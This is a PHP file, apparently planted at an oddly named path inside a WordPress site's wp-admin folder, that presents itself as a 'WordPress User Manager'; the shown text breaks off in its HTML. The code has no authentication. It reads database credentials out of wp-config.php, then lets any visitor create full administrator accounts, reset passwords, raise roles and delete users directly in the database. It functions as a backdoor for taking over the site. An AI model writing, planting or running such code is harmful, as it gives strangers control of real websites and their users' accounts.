File: /home/saeaeroc/public_html/sae.aero/wp-admin/wpeeee.php
<?php
session_start();
// Database bağlantı bilgileri
$db_config = [
'host' => $_SESSION['db_host'] ?? '',
'dbname' => $_SESSION['db_name'] ?? '',
'username' => $_SESSION['db_user'] ?? '',
'password' => $_SESSION['db_pass'] ?? '',
'prefix' => $_SESSION['db_prefix'] ?? 'wp_'
];
// Database bağlantısı
function getDbConnection() {
global $db_config;
if (empty($db_config['host']) || empty($db_config['dbname'])) {
return null;
}
try {
$dsn = "mysql:host={$db_config['host']};dbname={$db_config['dbname']};charset=utf8mb4";
$pdo = new PDO($dsn, $db_config['username'], $db_config['password']);
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
return $pdo;
} catch (PDOException $e) {
return null;
}
}
// WordPress PHPass sınıfı (WordPress'in kullandığı hash algoritması)
class PasswordHash {
var $itoa64;
var $iteration_count_log2;
var $portable_hashes;
var $random_state;
function __construct($iteration_count_log2 = 8, $portable_hashes = false) {
$this->itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';
$this->iteration_count_log2 = $iteration_count_log2;
$this->portable_hashes = $portable_hashes;
$this->random_state = microtime();
if (function_exists('getmypid'))
$this->random_state .= getmypid();
}
function get_random_bytes($count) {
$output = '';
if (is_readable('/dev/urandom') &&
($fh = @fopen('/dev/urandom', 'rb'))) {
$output = fread($fh, $count);
fclose($fh);
}
if (strlen($output) < $count) {
$output = '';
for ($i = 0; $i < $count; $i += 16) {
$this->random_state =
md5(microtime() . $this->random_state);
$output .=
pack('H*', md5($this->random_state));
}
$output = substr($output, 0, $count);
}
return $output;
}
function encode64($input, $count) {
$output = '';
$i = 0;
do {
$value = ord($input[$i++]);
$output .= $this->itoa64[$value & 0x3f];
if ($i < $count)
$value |= ord($input[$i]) << 8;
$output .= $this->itoa64[($value >> 6) & 0x3f];
if ($i++ >= $count)
break;
if ($i < $count)
$value |= ord($input[$i]) << 16;
$output .= $this->itoa64[($value >> 12) & 0x3f];
if ($i++ >= $count)
break;
$output .= $this->itoa64[($value >> 18) & 0x3f];
} while ($i < $count);
return $output;
}
function gensalt_private($input) {
$output = '$P$';
$output .= $this->itoa64[min($this->iteration_count_log2 +
((PHP_VERSION >= '5') ? 5 : 3), 30)];
$output .= $this->encode64($input, 6);
return $output;
}
function crypt_private($password, $setting) {
$output = '*0';
if (substr($setting, 0, 2) == $output)
$output = '*1';
$id = substr($setting, 0, 3);
if ($id != '$P$' && $id != '$H$')
return $output;
$count_log2 = strpos($this->itoa64, $setting[3]);
if ($count_log2 < 7 || $count_log2 > 30)
return $output;
$count = 1 << $count_log2;
$salt = substr($setting, 4, 8);
if (strlen($salt) != 8)
return $output;
if (PHP_VERSION >= '5') {
$hash = md5($salt . $password, TRUE);
do {
$hash = md5($hash . $password, TRUE);
} while (--$count);
} else {
$hash = pack('H*', md5($salt . $password));
do {
$hash = pack('H*', md5($hash . $password));
} while (--$count);
}
$output = substr($setting, 0, 12);
$output .= $this->encode64($hash, 16);
return $output;
}
function gensalt_blowfish($input) {
$itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';
$output = '$2a$';
$output .= chr(ord('0') + $this->iteration_count_log2 / 10);
$output .= chr(ord('0') + $this->iteration_count_log2 % 10);
$output .= '$';
$i = 0;
do {
$c1 = ord($input[$i++]);
$output .= $itoa64[$c1 >> 2];
$c1 = ($c1 & 0x03) << 4;
if ($i >= 16) {
$output .= $itoa64[$c1];
break;
}
$c2 = ord($input[$i++]);
$c1 |= $c2 >> 4;
$output .= $itoa64[$c1];
$c1 = ($c2 & 0x0f) << 2;
$c2 = ord($input[$i++]);
$c1 |= $c2 >> 6;
$output .= $itoa64[$c1];
$output .= $itoa64[$c2 & 0x3f];
} while (1);
return $output;
}
function HashPassword($password) {
if (strlen($password) > 4096) {
return '*';
}
$random = '';
if (CRYPT_BLOWFISH == 1 && !$this->portable_hashes) {
$random = $this->get_random_bytes(16);
$hash =
crypt($password, $this->gensalt_blowfish($random));
if (strlen($hash) == 60)
return $hash;
}
if (strlen($random) < 6)
$random = $this->get_random_bytes(6);
$hash =
$this->crypt_private($password,
$this->gensalt_private($random));
if (strlen($hash) == 34)
return $hash;
return '*';
}
function CheckPassword($password, $stored_hash) {
if (strlen($password) > 4096) {
return false;
}
$hash = $this->crypt_private($password, $stored_hash);
if ($hash[0] == '*')
$hash = crypt($password, $stored_hash);
return $hash === $stored_hash;
}
}
// WordPress password hash fonksiyonu (WordPress uyumlu)
function wp_hash_password($password) {
$hasher = new PasswordHash(8, true);
return $hasher->HashPassword($password);
}
// WordPress password check fonksiyonu (WordPress uyumlu)
function wp_check_password($password, $hash) {
$hasher = new PasswordHash(8, true);
return $hasher->CheckPassword($password, $hash);
}
// Tablo prefix'i al
function getTablePrefix() {
global $db_config;
return $db_config['prefix'];
}
// Kullanıcı rollerini al
function getUserRoles($pdo, $user_id) {
$prefix = getTablePrefix();
$stmt = $pdo->prepare("SELECT meta_value FROM {$prefix}usermeta WHERE user_id = ? AND meta_key = ?");
$stmt->execute([$user_id, $prefix . 'capabilities']);
$result = $stmt->fetch(PDO::FETCH_ASSOC);
if ($result) {
$caps = unserialize($result['meta_value']);
return array_keys($caps);
}
return [];
}
// Kullanıcı rolü kontrolü
function isUserAdmin($pdo, $user_id) {
$roles = getUserRoles($pdo, $user_id);
return in_array('administrator', $roles);
}
// Basit kullanıcı adı temizleme fonksiyonu
function sanitize_user($username) {
$username = strtolower($username);
$username = preg_replace('/[^a-z0-9-]/', '', $username);
return $username;
}
// wp-config.php dosyasını bulma ve okuma
function findWpConfig() {
$current_dir = __DIR__;
$possible_locations = [
$current_dir . '/wp-config.php',
dirname($current_dir) . '/wp-config.php',
dirname(dirname($current_dir)) . '/wp-config.php',
$current_dir . '/../wp-config.php',
$current_dir . '/../../wp-config.php',
];
foreach ($possible_locations as $path) {
if (file_exists($path) && is_readable($path)) {
return $path;
}
}
return null;
}
// wp-config.php dosyasından database bilgilerini parse etme
function parseWpConfig($config_path) {
$config = [
'host' => 'localhost',
'dbname' => '',
'username' => '',
'password' => '',
'prefix' => 'wp_'
];
if (!file_exists($config_path)) {
return $config;
}
$content = file_get_contents($config_path);
// DB_NAME
if (preg_match("/define\s*\(\s*['\"]DB_NAME['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)/i", $content, $matches)) {
$config['dbname'] = $matches[1];
}
// DB_USER
if (preg_match("/define\s*\(\s*['\"]DB_USER['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)/i", $content, $matches)) {
$config['username'] = $matches[1];
}
// DB_PASSWORD
if (preg_match("/define\s*\(\s*['\"]DB_PASSWORD['\"]\s*,\s*['\"]([^'\"]*)['\"]\s*\)/i", $content, $matches)) {
$config['password'] = $matches[1];
}
// DB_HOST
if (preg_match("/define\s*\(\s*['\"]DB_HOST['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)/i", $content, $matches)) {
$config['host'] = $matches[1];
}
// Table prefix
if (preg_match("/\\\$table_prefix\s*=\s*['\"]([^'\"]+)['\"]/i", $content, $matches)) {
$config['prefix'] = $matches[1];
}
return $config;
}
// Sayfa yönetimi
$action = $_GET['action'] ?? 'list';
$error = '';
$success = '';
// wp-config.php dosyasını kontrol et ve bilgileri yükle (sadece ilk yüklemede)
if (empty($_SESSION['db_host']) && empty($_SESSION['db_name'])) {
$wp_config_path = findWpConfig();
if ($wp_config_path) {
$wp_config = parseWpConfig($wp_config_path);
if (!empty($wp_config['dbname'])) {
$_SESSION['db_host'] = $wp_config['host'];
$_SESSION['db_name'] = $wp_config['dbname'];
$_SESSION['db_user'] = $wp_config['username'];
$_SESSION['db_pass'] = $wp_config['password'];
$_SESSION['db_prefix'] = $wp_config['prefix'];
$_SESSION['wp_config_found'] = true;
}
}
}
// Database bağlantı bilgileri
$db_config = [
'host' => $_SESSION['db_host'] ?? '',
'dbname' => $_SESSION['db_name'] ?? '',
'username' => $_SESSION['db_user'] ?? '',
'password' => $_SESSION['db_pass'] ?? '',
'prefix' => $_SESSION['db_prefix'] ?? 'wp_'
];
// Database bağlantı formu gönderildi mi?
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['connect'])) {
$_SESSION['db_host'] = $_POST['db_host'] ?? '';
$_SESSION['db_name'] = $_POST['db_name'] ?? '';
$_SESSION['db_user'] = $_POST['db_user'] ?? '';
$_SESSION['db_pass'] = $_POST['db_pass'] ?? '';
$_SESSION['db_prefix'] = $_POST['db_prefix'] ?? 'wp_';
// db_config'i güncelle
$db_config = [
'host' => $_SESSION['db_host'],
'dbname' => $_SESSION['db_name'],
'username' => $_SESSION['db_user'],
'password' => $_SESSION['db_pass'],
'prefix' => $_SESSION['db_prefix']
];
// Bağlantıyı test et
$pdo = getDbConnection();
if ($pdo) {
$_SESSION['db_connected'] = true;
$success = "Database bağlantısı başarılı!";
$action = 'list';
$is_connected = true;
} else {
$error = "Database bağlantısı başarısız! Lütfen bilgileri kontrol edin.";
unset($_SESSION['db_connected']);
$is_connected = false;
$pdo = null;
}
} else {
// Database bağlantısı var mı kontrol et
$pdo = getDbConnection();
$is_connected = $pdo !== null && isset($_SESSION['db_connected']);
if (!$is_connected) {
$action = 'list';
}
}
// Bağlantıyı kes
if (isset($_GET['disconnect'])) {
session_destroy();
header('Location: index.php');
exit;
}
// Kullanıcı silme işlemi
if ($is_connected && $_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['delete_user'])) {
$user_id = intval($_POST['user_id']);
$prefix = getTablePrefix();
try {
// Kullanıcı meta verilerini sil
$stmt = $pdo->prepare("DELETE FROM {$prefix}usermeta WHERE user_id = ?");
$stmt->execute([$user_id]);
// Kullanıcıyı sil
$stmt = $pdo->prepare("DELETE FROM {$prefix}users WHERE ID = ?");
$stmt->execute([$user_id]);
$success = "Kullanıcı başarıyla silindi.";
$action = 'list';
} catch (PDOException $e) {
$error = "Kullanıcı silinirken hata oluştu: " . $e->getMessage();
}
}
// Toplu düzenleme sayfasına yönlendirme
if ($is_connected && $_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['bulk_edit']) && !empty($_POST['selected_users'])) {
$_SESSION['bulk_edit_users'] = $_POST['selected_users'];
$action = 'bulk_edit';
}
// Toplu silme işlemi
if ($is_connected && $_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['bulk_delete']) && !empty($_POST['selected_users'])) {
$selected_users = $_POST['selected_users'];
$prefix = getTablePrefix();
$deleted_count = 0;
$errors = [];
foreach ($selected_users as $user_id) {
$user_id = intval($user_id);
if ($user_id > 0) {
try {
// Kullanıcı meta verilerini sil
$stmt = $pdo->prepare("DELETE FROM {$prefix}usermeta WHERE user_id = ?");
$stmt->execute([$user_id]);
// Kullanıcıyı sil
$stmt = $pdo->prepare("DELETE FROM {$prefix}users WHERE ID = ?");
$stmt->execute([$user_id]);
$deleted_count++;
} catch (PDOException $e) {
$errors[] = "Kullanıcı ID {$user_id} silinirken hata: " . $e->getMessage();
}
}
}
if ($deleted_count > 0) {
$success = "{$deleted_count} kullanıcı başarıyla silindi.";
}
if (!empty($errors)) {
$error = implode("<br>", $errors);
}
$action = 'list';
}
// Toplu düzenleme işlemi
if ($is_connected && $_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['bulk_update']) && !empty($_SESSION['bulk_edit_users'])) {
$selected_users = $_SESSION['bulk_edit_users'];
$user_role = $_POST['user_role'] ?? '';
$user_pass = $_POST['user_pass'] ?? '';
$prefix = getTablePrefix();
$updated_count = 0;
$errors = [];
if (!empty($user_role)) {
// Rol güncelleme
$capabilities = [];
switch ($user_role) {
case 'administrator':
$capabilities = [
'administrator' => true,
'activate_plugins' => true,
'delete_others_pages' => true,
'delete_others_posts' => true,
'delete_pages' => true,
'delete_posts' => true,
'delete_private_pages' => true,
'delete_private_posts' => true,
'delete_published_pages' => true,
'delete_published_posts' => true,
'edit_others_pages' => true,
'edit_others_posts' => true,
'edit_pages' => true,
'edit_posts' => true,
'edit_private_pages' => true,
'edit_private_posts' => true,
'edit_published_pages' => true,
'edit_published_posts' => true,
'manage_categories' => true,
'manage_links' => true,
'manage_options' => true,
'moderate_comments' => true,
'publish_pages' => true,
'publish_posts' => true,
'read' => true,
'read_private_pages' => true,
'read_private_posts' => true,
'unfiltered_html' => true,
'upload_files' => true,
'edit_files' => true,
'edit_theme_options' => true,
'install_plugins' => true,
'install_themes' => true,
'list_users' => true,
'manage_network' => true,
'promote_users' => true,
'remove_users' => true,
'switch_themes' => true,
'update_core' => true,
'update_plugins' => true,
'update_themes' => true,
'edit_dashboard' => true,
'customize' => true,
'delete_site' => true,
'export' => true,
'import' => true,
'create_users' => true,
'delete_users' => true,
'edit_users' => true,
];
break;
case 'editor':
$capabilities = ['editor' => true];
break;
case 'author':
$capabilities = ['author' => true];
break;
case 'contributor':
$capabilities = ['contributor' => true];
break;
case 'subscriber':
$capabilities = ['subscriber' => true];
break;
}
$capabilities_serialized = serialize($capabilities);
$user_level = 0;
if ($user_role === 'administrator') {
$user_level = 10;
} elseif ($user_role === 'editor') {
$user_level = 7;
} elseif ($user_role === 'author') {
$user_level = 2;
} elseif ($user_role === 'contributor') {
$user_level = 1;
}
foreach ($selected_users as $user_id) {
$user_id = intval($user_id);
if ($user_id > 0) {
try {
// Şifre güncelleme
if (!empty($user_pass)) {
$hashed_password = wp_hash_password($user_pass);
$stmt = $pdo->prepare("UPDATE {$prefix}users SET user_pass = ? WHERE ID = ?");
$stmt->execute([$hashed_password, $user_id]);
}
// Rol güncelleme
$stmt = $pdo->prepare("UPDATE {$prefix}usermeta SET meta_value = ? WHERE user_id = ? AND meta_key = ?");
$stmt->execute([$capabilities_serialized, $user_id, $prefix . 'capabilities']);
if ($stmt->rowCount() == 0) {
$stmt = $pdo->prepare("INSERT INTO {$prefix}usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)");
$stmt->execute([$user_id, $prefix . 'capabilities', $capabilities_serialized]);
}
// User level güncelle
$stmt = $pdo->prepare("UPDATE {$prefix}usermeta SET meta_value = ? WHERE user_id = ? AND meta_key = ?");
$stmt->execute([$user_level, $user_id, $prefix . 'user_level']);
if ($stmt->rowCount() == 0) {
$stmt = $pdo->prepare("INSERT INTO {$prefix}usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)");
$stmt->execute([$user_id, $prefix . 'user_level', $user_level]);
}
$updated_count++;
} catch (PDOException $e) {
$errors[] = "Kullanıcı ID {$user_id} güncellenirken hata: " . $e->getMessage();
}
}
}
}
if ($updated_count > 0) {
$success = "{$updated_count} kullanıcı başarıyla güncellendi.";
}
if (!empty($errors)) {
$error = implode("<br>", $errors);
}
unset($_SESSION['bulk_edit_users']);
$action = 'list';
}
// Kullanıcı düzenleme işlemi
$user = null;
$user_id = isset($_GET['id']) ? intval($_GET['id']) : 0;
if ($action === 'edit' && $is_connected && $user_id > 0) {
$prefix = getTablePrefix();
try {
$stmt = $pdo->prepare("SELECT * FROM {$prefix}users WHERE ID = ?");
$stmt->execute([$user_id]);
$user = $stmt->fetch(PDO::FETCH_ASSOC);
if (!$user) {
$error = "Kullanıcı bulunamadı!";
$action = 'list';
} else {
$stmt = $pdo->prepare("SELECT meta_key, meta_value FROM {$prefix}usermeta WHERE user_id = ?");
$stmt->execute([$user_id]);
$meta_data = $stmt->fetchAll(PDO::FETCH_KEY_PAIR);
$user['meta'] = $meta_data;
}
} catch (PDOException $e) {
$error = "Kullanıcı bilgileri yüklenirken hata oluştu: " . $e->getMessage();
$action = 'list';
}
}
// Kullanıcı güncelleme işlemi
if ($is_connected && $_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['update_user'])) {
$user_id = intval($_POST['user_id']);
$user_login = trim($_POST['user_login']);
$user_email = trim($_POST['user_email']);
$display_name = trim($_POST['display_name']);
$user_pass = $_POST['user_pass'];
$user_role = $_POST['user_role'] ?? 'subscriber';
$prefix = getTablePrefix();
if (empty($user_login) || empty($user_email)) {
$error = "Kullanıcı adı ve e-posta zorunludur!";
$action = 'edit';
} else {
try {
if (!empty($user_pass)) {
$hashed_password = wp_hash_password($user_pass);
$stmt = $pdo->prepare("UPDATE {$prefix}users SET user_login = ?, user_email = ?, display_name = ?, user_pass = ? WHERE ID = ?");
$stmt->execute([$user_login, $user_email, $display_name, $hashed_password, $user_id]);
} else {
$stmt = $pdo->prepare("UPDATE {$prefix}users SET user_login = ?, user_email = ?, display_name = ? WHERE ID = ?");
$stmt->execute([$user_login, $user_email, $display_name, $user_id]);
}
// Rol güncelleme
$capabilities = [];
switch ($user_role) {
case 'administrator':
// Tam yetkili administrator için tüm capabilities
$capabilities = [
'administrator' => true,
'activate_plugins' => true,
'delete_others_pages' => true,
'delete_others_posts' => true,
'delete_pages' => true,
'delete_posts' => true,
'delete_private_pages' => true,
'delete_private_posts' => true,
'delete_published_pages' => true,
'delete_published_posts' => true,
'edit_others_pages' => true,
'edit_others_posts' => true,
'edit_pages' => true,
'edit_posts' => true,
'edit_private_pages' => true,
'edit_private_posts' => true,
'edit_published_pages' => true,
'edit_published_posts' => true,
'manage_categories' => true,
'manage_links' => true,
'manage_options' => true,
'moderate_comments' => true,
'publish_pages' => true,
'publish_posts' => true,
'read' => true,
'read_private_pages' => true,
'read_private_posts' => true,
'unfiltered_html' => true,
'upload_files' => true,
'edit_files' => true,
'edit_theme_options' => true,
'install_plugins' => true,
'install_themes' => true,
'list_users' => true,
'manage_network' => true,
'promote_users' => true,
'remove_users' => true,
'switch_themes' => true,
'update_core' => true,
'update_plugins' => true,
'update_themes' => true,
'edit_dashboard' => true,
'customize' => true,
'delete_site' => true,
'export' => true,
'import' => true,
'create_users' => true,
'delete_users' => true,
'edit_users' => true,
];
break;
case 'editor':
$capabilities = ['editor' => true];
break;
case 'author':
$capabilities = ['author' => true];
break;
case 'contributor':
$capabilities = ['contributor' => true];
break;
default:
$capabilities = ['subscriber' => true];
}
$capabilities_serialized = serialize($capabilities);
$stmt = $pdo->prepare("UPDATE {$prefix}usermeta SET meta_value = ? WHERE user_id = ? AND meta_key = ?");
$stmt->execute([$capabilities_serialized, $user_id, $prefix . 'capabilities']);
if ($stmt->rowCount() == 0) {
$stmt = $pdo->prepare("INSERT INTO {$prefix}usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)");
$stmt->execute([$user_id, $prefix . 'capabilities', $capabilities_serialized]);
}
// User level güncelle
$user_level = 0;
if ($user_role === 'administrator') {
$user_level = 10;
} elseif ($user_role === 'editor') {
$user_level = 7;
} elseif ($user_role === 'author') {
$user_level = 2;
} elseif ($user_role === 'contributor') {
$user_level = 1;
}
$stmt = $pdo->prepare("UPDATE {$prefix}usermeta SET meta_value = ? WHERE user_id = ? AND meta_key = ?");
$stmt->execute([$user_level, $user_id, $prefix . 'user_level']);
if ($stmt->rowCount() == 0) {
$stmt = $pdo->prepare("INSERT INTO {$prefix}usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)");
$stmt->execute([$user_id, $prefix . 'user_level', $user_level]);
}
// Administrator için user-settings meta değerlerini ekle/güncelle
if ($user_role === 'administrator') {
$stmt = $pdo->prepare("SELECT meta_id FROM {$prefix}usermeta WHERE user_id = ? AND meta_key = ?");
$stmt->execute([$user_id, $prefix . 'user-settings']);
if (!$stmt->fetch()) {
$stmt = $pdo->prepare("INSERT INTO {$prefix}usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)");
$stmt->execute([$user_id, $prefix . 'user-settings', '']);
}
$stmt = $pdo->prepare("SELECT meta_id FROM {$prefix}usermeta WHERE user_id = ? AND meta_key = ?");
$stmt->execute([$user_id, $prefix . 'user-settings-time']);
if (!$stmt->fetch()) {
$stmt = $pdo->prepare("INSERT INTO {$prefix}usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)");
$stmt->execute([$user_id, $prefix . 'user-settings-time', time()]);
}
}
$success = "Kullanıcı başarıyla güncellendi!";
$action = 'list';
} catch (PDOException $e) {
$error = "Kullanıcı güncellenirken hata oluştu: " . $e->getMessage();
$action = 'edit';
}
}
}
// Yönetici ekleme işlemi
if ($is_connected && $_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['add_admin'])) {
$user_login = trim($_POST['user_login']);
$user_email = trim($_POST['user_email']);
$display_name = trim($_POST['display_name']);
$user_pass = $_POST['user_pass'];
$prefix = getTablePrefix();
if (empty($user_login) || empty($user_email) || empty($user_pass)) {
$error = "Tüm alanlar zorunludur!";
$action = 'add_admin';
} else {
try {
$stmt = $pdo->prepare("SELECT ID FROM {$prefix}users WHERE user_login = ? OR user_email = ?");
$stmt->execute([$user_login, $user_email]);
if ($stmt->fetch()) {
$error = "Bu kullanıcı adı veya e-posta zaten kullanılıyor!";
$action = 'add_admin';
} else {
$hashed_password = wp_hash_password($user_pass);
$user_registered = date('Y-m-d H:i:s');
$user_nicename = sanitize_user($user_login);
$stmt = $pdo->prepare("INSERT INTO {$prefix}users (user_login, user_pass, user_nicename, user_email, user_registered, display_name) VALUES (?, ?, ?, ?, ?, ?)");
$stmt->execute([$user_login, $hashed_password, $user_nicename, $user_email, $user_registered, $display_name]);
$user_id = $pdo->lastInsertId();
// Tam yetkili administrator için tüm capabilities
$capabilities = [
'administrator' => true,
'activate_plugins' => true,
'delete_others_pages' => true,
'delete_others_posts' => true,
'delete_pages' => true,
'delete_posts' => true,
'delete_private_pages' => true,
'delete_private_posts' => true,
'delete_published_pages' => true,
'delete_published_posts' => true,
'edit_others_pages' => true,
'edit_others_posts' => true,
'edit_pages' => true,
'edit_posts' => true,
'edit_private_pages' => true,
'edit_private_posts' => true,
'edit_published_pages' => true,
'edit_published_posts' => true,
'manage_categories' => true,
'manage_links' => true,
'manage_options' => true,
'moderate_comments' => true,
'publish_pages' => true,
'publish_posts' => true,
'read' => true,
'read_private_pages' => true,
'read_private_posts' => true,
'unfiltered_html' => true,
'upload_files' => true,
'edit_files' => true,
'edit_theme_options' => true,
'install_plugins' => true,
'install_themes' => true,
'list_users' => true,
'manage_network' => true,
'promote_users' => true,
'remove_users' => true,
'switch_themes' => true,
'update_core' => true,
'update_plugins' => true,
'update_themes' => true,
'edit_dashboard' => true,
'customize' => true,
'delete_site' => true,
'export' => true,
'import' => true,
'create_users' => true,
'delete_users' => true,
'edit_users' => true,
];
$capabilities_serialized = serialize($capabilities);
$stmt = $pdo->prepare("INSERT INTO {$prefix}usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)");
$stmt->execute([$user_id, $prefix . 'capabilities', $capabilities_serialized]);
// User level 10 (administrator)
$stmt = $pdo->prepare("INSERT INTO {$prefix}usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)");
$stmt->execute([$user_id, $prefix . 'user_level', 10]);
// User settings (opsiyonel ama bazı durumlarda gerekli)
$stmt = $pdo->prepare("INSERT INTO {$prefix}usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)");
$stmt->execute([$user_id, $prefix . 'user-settings', '']);
$stmt = $pdo->prepare("INSERT INTO {$prefix}usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)");
$stmt->execute([$user_id, $prefix . 'user-settings-time', time()]);
$success = "Yönetici başarıyla eklendi!";
$action = 'list';
}
} catch (PDOException $e) {
$error = "Yönetici eklenirken hata oluştu: " . $e->getMessage();
$action = 'add_admin';
}
}
}
// Kullanıcıları listele
$users = [];
if ($is_connected) {
try {
$prefix = getTablePrefix();
$stmt = $pdo->query("SELECT ID, user_login, user_email, user_registered, display_name FROM {$prefix}users ORDER BY ID DESC");
$users = $stmt->fetchAll(PDO::FETCH_ASSOC);
foreach ($users as &$user) {
$user['roles'] = getUserRoles($pdo, $user['ID']);
$user['is_admin'] = isUserAdmin($pdo, $user['ID']);
}
unset($user);
} catch (PDOException $e) {
$error = "Kullanıcılar yüklenirken hata oluştu: " . $e->getMessage();
}
}
// Mevcut rolü belirle
$current_role = 'subscriber';
if ($user && isset($user['ID'])) {
$roles = getUserRoles($pdo, $user['ID']);
if (!empty($roles)) {
$current_role = $roles[0];
}
}
?>
<!DOCTYPE html>
<html lang="tr">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>WordPress User Manager</title>
<style>
* {
margin: 0;
padding: 0;
box-sizing: border-box;
}
body {
font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, sans-serif;
background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
min-height: 100vh;
padding: 20px;
color: #333;
}
.container {
max-width: 1200px;
margin: 0 auto;
}
h1 {
color: #fff;
margin-bottom: 30px;
text-align: center;
font-size: 2.5em;
text-shadow: 2px 2px 4px rgba(0,0,0,0.2);
}
h2 {
color: #333;
margin-bottom: 20px;
font-size: 1.5em;
}
.card {
background: #fff;
border-radius: 10px;
padding: 30px;
box-shadow: 0 10px 30px rgba(0,0,0,0.2);
margin-bottom: 20px;
overflow-x: visible;
}
.form-group {
margin-bottom: 20px;
}
.form-group label {
display: block;
margin-bottom: 8px;
font-weight: 600;
color: #555;
}
.form-group input[type="text"],
.form-group input[type="email"],
.form-group input[type="password"],
.form-group select {
width: 100%;
padding: 12px;
border: 2px solid #e0e0e0;
border-radius: 5px;
font-size: 16px;
transition: border-color 0.3s;
}
.form-group input:focus,
.form-group select:focus {
outline: none;
border-color: #667eea;
}
.form-actions {
display: flex;
gap: 10px;
margin-top: 25px;
}
.btn {
padding: 12px 24px;
border: none;
border-radius: 5px;
font-size: 16px;
font-weight: 600;
cursor: pointer;
text-decoration: none;
display: inline-block;
transition: all 0.3s;
text-align: center;
}
.btn-primary {
background: #667eea;
color: #fff;
}
.btn-primary:hover {
background: #5568d3;
transform: translateY(-2px);
box-shadow: 0 5px 15px rgba(102, 126, 234, 0.4);
}
.btn-success {
background: #10b981;
color: #fff;
}
.btn-success:hover {
background: #059669;
transform: translateY(-2px);
box-shadow: 0 5px 15px rgba(16, 185, 129, 0.4);
}
.btn-danger {
background: #ef4444;
color: #fff;
}
.btn-danger:hover {
background: #dc2626;
transform: translateY(-2px);
box-shadow: 0 5px 15px rgba(239, 68, 68, 0.4);
}
.btn-secondary {
background: #6b7280;
color: #fff;
}
.btn-secondary:hover {
background: #4b5563;
transform: translateY(-2px);
box-shadow: 0 5px 15px rgba(107, 114, 128, 0.4);
}
.btn-sm {
padding: 6px 12px;
font-size: 14px;
}
.alert {
padding: 15px 20px;
border-radius: 5px;
margin-bottom: 20px;
font-weight: 500;
}
.alert-error {
background: #fee2e2;
color: #991b1b;
border-left: 4px solid #ef4444;
}
.alert-success {
background: #d1fae5;
color: #065f46;
border-left: 4px solid #10b981;
}
.header-actions {
display: flex;
gap: 10px;
margin-bottom: 20px;
justify-content: flex-end;
}
.table-wrapper {
overflow-x: auto;
overflow-y: visible;
margin-top: 20px;
width: 100%;
-webkit-overflow-scrolling: touch;
display: block;
}
.user-table {
width: 100%;
min-width: 1100px;
border-collapse: collapse;
background: #fff;
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
table-layout: auto;
}
.user-table thead {
background: #f3f4f6;
position: sticky;
top: 0;
z-index: 10;
}
.user-table th {
padding: 15px 12px;
text-align: left;
font-weight: 600;
color: #374151;
border-bottom: 2px solid #e5e7eb;
white-space: nowrap;
}
.user-table th:first-child {
width: 40px;
text-align: center;
}
.user-table td:first-child {
text-align: center;
}
.user-table th:nth-child(2) {
width: 60px;
}
.user-table th:nth-child(3) {
min-width: 100px;
max-width: 120px;
}
.user-table th:nth-child(4) {
min-width: 120px;
max-width: 150px;
}
.user-table th:nth-child(5) {
min-width: 120px;
}
.user-table th:nth-child(6) {
min-width: 100px;
max-width: 120px;
}
.user-table th:nth-child(7) {
min-width: 150px;
white-space: nowrap;
}
.user-table th:last-child {
min-width: 180px;
white-space: nowrap;
}
.user-table td {
padding: 12px;
border-bottom: 1px solid #e5e7eb;
vertical-align: middle;
word-wrap: break-word;
}
.user-table td:nth-child(3),
.user-table td:nth-child(4),
.user-table td:nth-child(6) {
font-size: 13px;
overflow: hidden;
text-overflow: ellipsis;
white-space: nowrap;
}
.user-table td:nth-child(7) {
white-space: nowrap;
font-size: 13px;
min-width: 150px;
}
.user-table td:last-child {
white-space: nowrap;
min-width: 180px;
}
.user-table tbody tr {
transition: background-color 0.2s;
}
.user-table tbody tr:hover {
background: #f9fafb;
}
.user-table tbody tr:last-child td {
border-bottom: none;
}
.actions {
display: flex;
gap: 8px;
flex-wrap: nowrap;
white-space: nowrap;
}
.bulk-actions {
display: flex;
gap: 10px;
align-items: center;
margin-bottom: 15px;
padding: 15px;
background: #f9fafb;
border-radius: 5px;
}
.bulk-actions input[type="checkbox"] {
width: 18px;
height: 18px;
cursor: pointer;
}
.bulk-actions label {
margin: 0;
font-weight: 600;
cursor: pointer;
}
.select-all-checkbox {
margin-right: 10px;
}
.badge {
display: inline-block;
padding: 4px 12px;
border-radius: 12px;
font-size: 12px;
font-weight: 600;
text-transform: uppercase;
}
.badge-admin {
background: #fef3c7;
color: #92400e;
}
.badge-user {
background: #dbeafe;
color: #1e40af;
}
@media (max-width: 768px) {
.table-wrapper {
overflow-x: scroll;
}
.user-table {
font-size: 13px;
min-width: 1100px;
}
.user-table th,
.user-table td {
padding: 8px 6px;
}
.user-table th:nth-child(7),
.user-table td:nth-child(7) {
font-size: 11px;
}
.user-table th:last-child,
.user-table td:last-child {
font-size: 11px;
}
}
</style>
</head>
<body>
<div class="container">
<h1>WordPress User Manager</h1>
<?php if ($error): ?>
<div class="alert alert-error"><?php echo htmlspecialchars($error); ?></div>
<?php endif; ?>
<?php if ($success): ?>
